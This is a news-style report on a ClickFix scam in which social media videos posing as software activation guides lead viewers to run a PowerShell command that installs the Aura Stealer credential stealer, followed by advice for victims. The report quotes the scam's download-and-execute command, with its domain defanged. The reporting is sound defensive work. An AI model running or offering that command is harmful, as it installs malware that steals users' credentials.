Online Scammers Use Social Media Videos to Spread Malicious Software
There is growing concern over a recent scam in which online tricksters disguise harmful software as free activation guides for popular applications, spread through social media videos. These videos claim to offer step-by-step instructions for unlocking premium features of widely used software but instead lead viewers to run a command that downloads malware onto their devices.
Understanding the Scam
These deceptive videos are part of a larger operation that has been identified by cybersecurity experts. The videos, which appear on a popular social video platform, claim to offer guidance on how to access legitimate services like operating systems, professional video editing software, and even premium features of popular music and video streaming platforms.
These guides are part of a social engineering attack known as a ClickFix attack. This technique uses seemingly genuine "solutions" or instructions that trick users into running harmful commands or scripts on their devices. These commands then install malicious software on their computers.
How the Scam Works
The videos typically show a single command and instruct viewers to run it as an administrator in PowerShell, a task automation and configuration management framework from a popular software company:
iex (irm slmgr[.]win/photoshop)
The last part of the URL varies with the software the video claims to activate: in videos that promise to activate an operating system, the URL ends with the name of that operating system rather than 'photoshop'. (The domain is written with '[.]' in place of the dot, the usual defanging convention that keeps an indicator from being clickable.)
When the command is run, PowerShell connects to the remote site, retrieves a script and executes it in memory. That script then downloads two executable files from seemingly harmless pages; the first is a variant of the Aura Stealer malware.
This malware is designed to collect saved credentials from various applications including browsers, cryptocurrency wallets, and other programs, and then transmit them to the scammers, compromising the user's accounts.
Additional Payloads
A cybersecurity expert has pointed out that a second payload, named 'source.exe', is also downloaded. It compiles code at runtime using a compiler built into a popular software development platform, and the resulting code is injected and launched in memory. The exact purpose of this additional payload is currently uncertain.
Protecting Yourself
If you have fallen victim to this scam and run the command, treat all of your saved credentials as compromised: change your passwords on every site you use, starting with email, banking and cryptocurrency accounts, and do so from a device that has not run the command.
ClickFix attacks have grown increasingly common over the past year, being utilized to distribute various types of malware in ransomware and cryptocurrency theft campaigns. It's crucial to remain vigilant and ensure that any guides followed are from trusted, verified sources to avoid falling victim to such scams.